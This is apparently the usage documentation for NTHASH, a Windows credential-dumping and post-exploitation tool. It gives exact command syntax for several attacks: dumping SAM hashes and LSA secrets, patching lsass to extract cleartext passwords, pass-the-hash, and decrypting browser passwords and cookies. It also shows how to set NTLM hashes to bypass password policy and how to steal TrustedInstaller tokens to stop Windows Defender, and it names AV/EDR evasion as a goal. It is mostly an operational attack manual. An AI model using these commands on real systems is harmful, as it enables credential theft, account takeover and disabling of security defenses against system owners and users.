setntlm changentlm getntlmhash getsid getusers getdomains dumpsam dumphashes getsamkey getsyskey dumpsecret getlsakeys wdigest wdigeston logonpasswords pth enumcred enumcred2 enumvault chrome ccookies firefox fcookies hexatostring stringtohexa widestringtohexa filetohexa hexatofile base64encodew base64encode base64encodehexa base64decode base64decodehexa getlsasecret dpapimk cryptunprotectdata cryptprotectdata decodeblob decodemk wlansvc gethash gethmac getcipher runasuser runastoken runaschild runas runts enumpriv enumproc dumpproc runwmi context changentlm, using a legacy api (SamiChangePasswordUser), may not work if your ntlm hashes are encrypted with AES (i.e starting with win10 1607. Credits goes to https://github.com/vletoux/NTLMInjector NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx setntlm on the other hand should always work (using SamSetInformationUser) and allow one to bypass password policy. Credits goes to https://github.com/vletoux/NTLMInjector NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx getntlmhash will generate a ntlm hash. Advapi32.dll undocumented function SystemFunction007 is used. NTHASH /getntlmhash /password:password echo password | nthash-win64 /getntlmhash | wtee output.ntlm getsid will provide the sid of a user. NTHASH /getsid /user:username [/server:hostname] getusers will provide a list of users. Samlib.dll SamEnumerateUsersInDomain function is used. NTHASH /getusers [/server:hostname] getdomains will provide a list of domains. Samlib.dll SamEnumerateDomainsInSamServer function is used. NTHASH /getdomains [/server:hostname dumpsam will temporarily patch a module in lsass to be able to dump your SAM ntlm hashes from the lsass memory (need to cover/test as many windows version as possible). NTHASH /dumpsam dumphash and dumphashes will read the registry - you need to run as system to perform this action . Or you can use the /system switch . You can also perform this offline (and then no longer require to run as system). You can use reg save hklm\sam sam.sav and reg save hklm\system system.sav to generate offline hives. Both the RC4 (using advapi32.dll) and AES128 (using cryptoapi.dll) cipher are supported. https://www.insecurity.be/blog/2018/01/21/retrieving-ntlm-hashes-and-what-changed-technical-writeup/ is a must read to understand RC4 vs AES. NTHASH /dumphashes [/offline] getsamkey (also known as hashed bootkey) will read/decrypt SAM\sam\Domains\account\F. Both the RC4 (using advapi32.dll) and AES128 (using cryptoapi.dll) cipher are supported. Samkey is required to dumphashes. NTHASH /getsamkey [/offline] getsyskey (also known as bootkey) will read/decode class attribute from SYSTEM\CurrentControlSet\Control\Lsa. Syskey is required to retrieve the samkey and dumpsecret. NTHASH /getsyskey [/offline] dumpsecret will decrypt secret (AES256 using cryptoapi.dll) from the registry (Security\Policy\secrets), online of offline. Use dumpsecret /input:dpapi_system to retrieve the dpapi system keys (user and computer) to decrypt system masterkeys. NTHASH /dumpsecret /input:secret [/offline] NTHASH /dumpsecret /input:dpapi_system [/offline] getlsakeys will read lsa keys from lsass memory (aes,des,iv). These are required for logonpasswords, wdigest, dpapimk. NTHASH /getlsakeys [/symbol] cryptunprotectdata and cryptprotectdata will decrypt/encrypt datas using dpapi under the running user context (or machine context actually). NTHASH /cryptunprotectdata /binary:filename [/hexa] NTHASH /cryptunprotectdata /input:hexastring [/hexa] NTHASH /cryptprotectdata /input:string echo Passw0rd1234 | nthash-win64 /cryptprotectdata decodeblob will decode an encrypted dpapi blob. If the decrypted masterkey is provided, it will also decrypt the blob and decode it. CryptDecrypt from cryptoapi is used. data.blob is the default filename. NTHASH /decodeblob /binary:filename [/input:sha1MK] decodemk will decode an encrypted dpapi masterley. If a pre key is provided, it will also decrypt the masterkey and decode it. CryptDecrypt from cryptoapi is used. NTHASH /decodemk /binary:filename [/input:hmachexastring] [/password:sha1pwdhexastring] example: nthash-win64 /decodemk /binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513 087-2265021005-1965656450-1001\75380869-42A8-42EC-9E9B-8518F42802EE /password:01A612FE247D7DFCE7DAB432D5831A6474FFFFFF | nthash-win64 /decodeblob or NTHASH-win64.exe /gethmac /mode:SHA1 /key:01A612FE247D7DFCE7DAB432D5831A6474FFFFFF /input:53002D0031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003200360035003000320031003000300035002D0031003900360035003600350036003400350030002D0031003000300031000000 | nthash-win64 /decodemk wlansvc will decrypt a blob (contained in xml files) used by the wlansvc service. Find these xml files with dir %programdata% /s /a /b | findstr /i interfaces. Note that this data is encrypted/decrypted under the system account If it cannot decrypt it, then it will dump the blob in blob.encrypted which can then be used with decodeblob. cryptunprotectdata is used. NTHASH /wlansvc /binary:filename gethash will hash a message. Supported hashes are SHA512, SHA256, SHA384, SHA1, MD5, MD4, MD2. CryptGetHashParam from cryptoapi is used. This function is internally used in many other crypt functions. NTHASH /gethash /mode:hashid /input:hexabytes gethmac will generate a keyed-hash message authentication code. Supported hashes are SHA512, SHA256, SHA384, SHA1, MD5, MD4, MD2. CryptGetHashParam from cryptoapi is used. This function is internally used in many other crypt functions. NTHASH /gethmac /mode:hashid /input:hexabytes /key:hexabytes getcipher will cipher a message with a key. Supported algo's are RC2, RC4, RC5, DES, 3DES, 3DES112, AES, AES128, AE256. Supported hashes are SHA512, SHA256, SHA384, SHA1, MD5 (default), MD4, MD2. You can alter the cipher mode by setting a dos var CRYPT_MODE with CBC, ECB (default), OFB, CFB, CTS. CryptEncrypt from cryptoapi is used. NTHASH /getcipher /mode:cipherid /input:hexabytes /key:hexabytes getlsasecret will retrieve lsa secrets using LsaRetrievePrivateData api. Use getlsasecret /input:dpapi_system to retrieve the dpapi system keys (user and computer) to decrypt system masterkeys. NTHASH /getlsasecret /input:secret [/server:hostname] NTHASH /getlsasecret /input:dpapi_system [/server:hostname] enumcred will use CredEnumerate windows API to enumerate the logged on user credentials. NTHASH /enumcred enumcred2 will use CredEnumerate windows API to enumerate the logged on user credentials while also patching lsass to dump all credentials. NTHASH /enumcred2 enumvault will use vaultcli.dll windows API to enumerate the logged on user vault credentials. NTHASH /enumvault chrome will decrypt chrome browser passwords either online (using cryptunprotectdata) or offline (using decodeblob). NTHASH /chrome [/binary:path_to_database] [/input:decryptedMK] ccookies will decrypt chrome browser cookies online (using cryptunprotectdata). NTHASH /ccookies [/binary:path_to_database] firefox will decrypt firefox browser passwords. NTHASH /firefox [/binary:path_to_database] fcookies will decrypt firefox browser cookies. NTHASH /fcookies [/binary:path_to_database] logonpasswords will dump (from lsass memory) lsasrv logon sessions primary credentials (hashes) and credential managers (clear text). Note that credentials are decrypted using the lsa keys and BcryptEncrypt from bcrypt32.dll. NTHASH /logonpasswords [/symbol] pth will create a suspended process with dummy credentials, dump logon sessions, patch the session matching the suspended process with new credentials (ntlm hashed password). Note that credentials are encrypted using the lsa keys and BcryptEncrypt from bcrypt32.dll. NTHASH /pth /user:username /password:myhash /domain:mydomain [/symbol] wdigest will dump (from lsass memory) wdigest sessions credentials (clear text). NTHASH /wdigest [/symbol] wdigeston will reenable wdigest by patching lsass.exe NTHASH /wdigeston [/symbol] dpapimk will dump (from lsass memory) dpapi decrypted masterkey's. Note that credentials are decrypted using the lsa keys and BcryptEncrypt from bcrypt32.dll. NTHASH /dpapimk [/symbol] runasuser will simply run a process with the provided cleartext credentials. Similar to the windows runas command. NTHASH /runasuser /user:username /password:password [/binary: x:\folder\bin.exe] runastoken can be used to run a process under a system account. Once under a system account, you can also "steal" a token from trustedinstaller (net start trustedinstaller before hand. Note that you can steal a trustedinstaller token directly by using the /system switch. With a trustedinstaller token, you can perform actions like stop windefend (or kill the process, or modify the AV settings, etc). See example below where you would start the trustedinstaller service, retrieve its pid and run a process as the account. @echo off net start trustedinstaller for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system ) NTHASH /runastoken /pid:12345 [/binary: x:\folder\bin.exe] NTHASH-win64 /enumproc /input:trustedinstaller.exe | nthash-win64 /runastoken /system runaschild can be used to run a process as a child of another existing/parent process. Note that some apps (like cmd.exe) will crash right after initialization with a c0000142. Wierdly enough, loading notepad.exe with this method and then launching cmd.exe from there works... NTHASH /runaschild /pid:12345 [/binary: x:\folder\bin.exe] runas will launch a process in elevated mode. That command should actually be renamed runaselevated. NTHASH /runas [/binary: x:\folder\bin.exe] runts will launch a process in the context of another TS session. Note that this one needs the setcbprivilege so you will have to find a token with such privilege first (like winlogon.exe). NTHASH /runts /user:session_id [/binary: x:\folder\bin.exe] runwmi will launch a process using wmi, locally or remotely NTHASH /runwmi /binary: x:\folder\bin.exe [/server:hostname] context will display various informations such as windows platform, version, elevated y/n, debugprivilege y/n, admin y/n … NTHASH /context enumpriv will list all privileges, enabled or not. Will possibly be used later on in batch mode. NTHASH /enumpriv enumproc will list (all – depending on the context) processes with the logged on user. Is used in the trusted.cmd batch. NTHASH /enumproc [/input:some.exe] echo lsass.exe | nthash-win64 /enumproc | nthash-win64 /killproc dumpproc will dump a process (similar to procdump). In the future, should ideally be using syscalls later on to avoid AV/EDR. NTHASH /dumpproc /pid:12345 hexatostring will convert hexadecimal to a string NTHASH /hexatostring /input:hexabytes stringtohexa will convert a string to hexadecimal NTHASH /stringtohexa /input:string echo password | NTHASH-win64.exe /stringtohexa | NTHASH-win64.exe /gethash /mode:MD5 | wtee output.md5 widestringtohexa will convert a string to unicode hexadecimal NTHASH /widestringtohexa /input:string filetohexa will convert file content to hexadecimal NTHASH /filetohexa [/binary:filename] data.blob is the default filename. nthash-win64 /filetohexa | nthash-win64 /base64encodehexa | wtee output.base64 hexatofile will convert hexacimal to a file NTHASH /hexatofile /input:hexabytes [/binary:filename] data.blob is the default filename. base64encodew will convert a string to unicode base64 NTHASH /base64encodew /input:string base64encode will convert a string to base64 NTHASH /base64encode /input:string echo password | nthash-win64 /base64encode | wtee output.base64 base64encodehexa will convert a hexa string to base64 NTHASH /base64encodehexa /input:hexastring base64decode will convert a base64 string to a string NTHASH /base64decode /input:base64string echo cGFzc3dvcmQg | nthash-win64 /base64decode type output.base64 | nthash-win64 /base64decode base64decodehexa will convert a base64 string to a hexa string NTHASH /base64decodehexa /input:base64string type output.base64 | nthash-win64 /base64decodehexa